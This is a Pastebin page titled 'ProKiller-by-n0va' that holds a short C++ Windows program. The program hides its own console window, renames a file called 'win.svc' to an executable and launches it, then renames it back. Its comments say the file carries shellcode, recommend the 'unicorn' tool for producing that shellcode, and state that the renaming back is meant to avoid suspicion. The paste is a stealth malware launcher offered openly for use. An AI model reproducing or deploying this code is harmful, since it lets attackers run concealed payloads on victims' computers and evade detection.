API tools faq
paste
n0va_sa

ProKiller-by-n0va

n0va_sa
Dec 26th, 2016
599
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 1.07 KB | None | 0 0
raw download clone embed print report
  1. #include <stdio.h>
  2. #include <windows.h>
  3. #define time 2
  4. //=======Prototyping========//
  5. int renameTheZeroDay();
  6. void hide();
  7. int renameBackTheZeroDay();
  8. int startProcess();
  9. //==========================//
  10. int main(){
  11.     hide();
  12.     renameTheZeroDay();
  13.     sleep(time);
  14.     renameBackTheZeroDay();
  15.     exit(0);
  16. }
  17. //================FUCTIONS===============//
  18. int startProcess(){
  19.     //starting the (PSH) FILE//Main Shell Code File
  20.     system ("start winSpon.exe");
  21.     return 1;
  22. }
  23. int renameTheZeroDay(){
  24.     //rename a file to .bat for furthur execution
  25.     int catcher;
  26.     system("rename win.svc winSpon.exe");//win.svc will be the simple file which will contain the batch Script\
  27.     you can use unicorn to generate the batch shellcode.
  28.     catcher = startProcess();
  29.     if(catcher == 0){
  30.         renameTheZeroDay();
  31.     }
  32.     else return 0;
  33. }
  34. int renameBackTheZeroDay(){
  35.     system("rename winSpon.exe win.svc");
  36.     return 0;
  37.     //after finishing reversing back, so to aint suspection
  38. }
  39. void hide(){
  40.     HWND stealth;
  41.     AllocConsole();
  42.     stealth = FindWindowA("ConsoleWindowClass",NULL);
  43.     ShowWindow (stealth,0);
  44. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!